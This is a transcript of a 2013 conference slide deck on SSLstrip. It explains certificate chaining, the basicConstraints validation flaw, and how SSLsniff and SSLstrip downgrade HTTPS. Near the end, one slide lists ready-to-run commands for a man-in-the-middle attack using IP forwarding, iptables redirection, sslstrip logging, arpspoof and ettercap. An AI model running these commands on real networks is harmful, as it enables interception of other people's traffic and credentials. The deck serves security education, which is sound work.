sslstrip stepan shykerynets 23.03.2013
TRANSCRIPT
![Page 1: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/1.jpg)
SSLstrip
Stepan Shykerynets
http://wisc.org.ua/ 23.03.2013
![Page 2: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/2.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 3: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/3.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 4: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/4.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 5: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/5.jpg)
!Attention
http://wisc.org.ua/ 23.03.2013
![Page 6: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/6.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 7: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/7.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 8: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/8.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 9: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/9.jpg)
http://wisc.org.ua/ 23.03.2013
![Page 10: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/10.jpg)
Private / Public key
Public key
Private key
SERVERCLIENT
http://wisc.org.ua/ 23.03.2013
![Page 11: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/11.jpg)
Private / Public key
Public key
Private key
SERVERCLIENT
Public key CA
http://wisc.org.ua/ 23.03.2013
![Page 12: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/12.jpg)
Private / Public key
Public key
Private key
SERVERCLIENT
Public key
CA
http://wisc.org.ua/ 23.03.2013
![Page 13: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/13.jpg)
Private / Public key
Message Public key
Encrypted message
Private key Message
http://wisc.org.ua/ 23.03.2013
![Page 14: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/14.jpg)
SSL And Certificate Chaining
http://wisc.org.ua/ 23.03.2013
![Page 15: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/15.jpg)
Certificate
• X509 Certificateversionserial numberissuervaliditysubjectpublic key
• Signature algorithm• Signature
http://wisc.org.ua/ 23.03.2013
![Page 16: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/16.jpg)
Certificate Chaining
CA CertificateEmbedded in browser.All powerful.Certifies that a site certificate is authentic.
Site CertificateIdentifies a particular URL.Is known to be authentic based on CA Certificate's signature.
http://wisc.org.ua/ 23.03.2013
![Page 17: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/17.jpg)
Certificate Chaining
CA CertificateEmbedded in browser.All powerful.Certifies that a site certificate is authentic.
Site CertificateIdentifies a particular URL.Is known to be authentic based on CA Certificate's signature.
Intermediate CANot embedded in browser.Still sort of all-powerful.Certifies that a site certificate is authentic.
http://wisc.org.ua/ 23.03.2013
![Page 18: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/18.jpg)
Certificate Chaining
VeriSign
Facebook.com
Intermediate CA
http://wisc.org.ua/ 23.03.2013
![Page 19: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/19.jpg)
Certificate Chains Can Be > 3
VeriSign
Facebook.com
Intermediate CA
Intermediate CA
http://wisc.org.ua/ 23.03.2013
![Page 20: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/20.jpg)
How do we validate these things?
• Verify that the leaf node has the name of the site you're connecting to.
• Verify that the leaf node hasn't expired.• Check the signature.• If the signing certificate is in our list of root
CA's, stop.• Otherwise, move one up the chain and repeat.
http://wisc.org.ua/ 23.03.2013
![Page 21: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/21.jpg)
Very tempting to use a simple recursive function.
Everyone focuses on the signature validation.
The result of a naive attempt at validation is a chain that is complete, but nothing more.
http://wisc.org.ua/ 23.03.2013
![Page 22: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/22.jpg)
What if …VeriSign
hack.org
Intermediate CA
Intermediate CA
http://wisc.org.ua/ 23.03.2013
![Page 23: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/23.jpg)
What if …VeriSign
hack.org
Intermediate CA
Intermediate CA
Facebook.com
http://wisc.org.ua/ 23.03.2013
![Page 24: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/24.jpg)
What they say :
• Verify that the leaf node has the name of the site you're connecting to.
• Verify that the leaf node hasn't expired.• Check the signature.• If the signing certificate is in our list of root
CA's, stop. • Otherwise, move one up the chain and repeat.
http://wisc.org.ua/ 23.03.2013
![Page 25: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/25.jpg)
But …
• All the signatures are valid• Nothing has expired• The chain is in fact• The root CA is embedded in the browser and
trusted
http://wisc.org.ua/ 23.03.2013
![Page 26: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/26.jpg)
The missing piece
http://wisc.org.ua/ 23.03.2013
![Page 27: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/27.jpg)
The missing piece
!
http://wisc.org.ua/ 23.03.2013
![Page 28: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/28.jpg)
The missing piece
http://wisc.org.ua/ 23.03.2013
![Page 29: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/29.jpg)
• Most CA's didn't explicitly set basic Constraints: CA=FALSE
• A lot of web browsers and other SSL implementations didn't bother to check it, whether the field was there or not
• Any one with a valid leaf node certificate could create and sign a leaf node certificate for any other domain.
http://wisc.org.ua/ 23.03.2013
![Page 30: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/30.jpg)
But we have one problem
http://wisc.org.ua/ 23.03.2013
![Page 31: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/31.jpg)
Smart browsers
http://wisc.org.ua/ 23.03.2013
![Page 32: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/32.jpg)
People are …
http://wisc.org.ua/ 23.03.2013
![Page 33: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/33.jpg)
People are …LAZY
http://wisc.org.ua/ 23.03.2013
![Page 34: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/34.jpg)
http://...https://...
http://wisc.org.ua/ 23.03.2013
![Page 35: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/35.jpg)
SSLsniff
http://wisc.org.ua/ 23.03.2013
![Page 36: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/36.jpg)
SSLsniff
• Intercept a connection from the client side.
• Generate a certificate for the site it is connecting to.
• Sign in with any random valid leaf node certificate.
• Pass that certificate chain to the client.
• Make normal SSL connection to the server.
• Pass data between client and server, decrypting and encrypting on each end.
http://wisc.org.ua/ 23.03.2013
![Page 37: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/37.jpg)
Web browsing
• SSL is almost never encountered directly.• It is either encountered as a result of:
A 302 redirect from HTTP URL to an HTTPS URL.An HTTPS link that a user click on from an HTTP page.
http://wisc.org.ua/ 23.03.2013
![Page 38: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/38.jpg)
SSLstrip
• Watch HTTP traffic go by.• Switch <a href="https://> to <a href="http://> and keep a map of what you've changed.• Switch Location: https:// to Location: http:// and keep a map of what you've changed.
http://wisc.org.ua/ 23.03.2013
![Page 39: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/39.jpg)
SSLstrip
• Watch HTTP traffic go by.• When we seen an HTTP request for URL that we've stripped, proxy that out as HTTPS to the server.•Watch the HTTPS traffic go by, log everything that we want, and keep a map of all relative, CSS and JS links that go by.
http://wisc.org.ua/ 23.03.2013
![Page 40: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/40.jpg)
SSLstrip
•The server never knows the difference. Everything looks secure on their end.•The client doesn't display any of the disastrous warnings that we want to avoid.•We see all the traffic.
http://wisc.org.ua/ 23.03.2013
![Page 41: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/41.jpg)
http://wisc.org.ua/ 23.03.2013
Let's simplify it…
![Page 42: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/42.jpg)
Time to action
http://wisc.org.ua/ 23.03.2013
![Page 43: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/43.jpg)
BackTrack : Giving Machine Guns to Monkeys since 2006
http://wisc.org.ua/ 23.03.2013
![Page 44: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/44.jpg)
Tools
• SSLstrip• ARPspoof• Ettercap
http://wisc.org.ua/ 23.03.2013
![Page 45: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/45.jpg)
Commands
• #bt echo "1" > /proc/sys/net/ipv4/ip_forward• # bt iptables -t nat -A PREROUTING -p tcp --
destination-port 80 -j REDIRECT --to-port 10000• #bt sslstrip -a -l 10000 -w log.txt –f• # arpspoof -i <yourNetworkdDevice> -t <yourTarget>
<theRoutersIpAddress>• # ettercap -T –q –i <yourNetworkdDevice>
http://wisc.org.ua/ 23.03.2013
![Page 46: SSLstrip Stepan Shykerynets 23.03.2013](https://reader036.vdocument.in/reader036/viewer/2022062313/56649c9c5503460f9495b52e/html5/thumbnails/46.jpg)
Protection
• Google services• High protection network equipment• Checking site certificates
http://wisc.org.ua/ 23.03.2013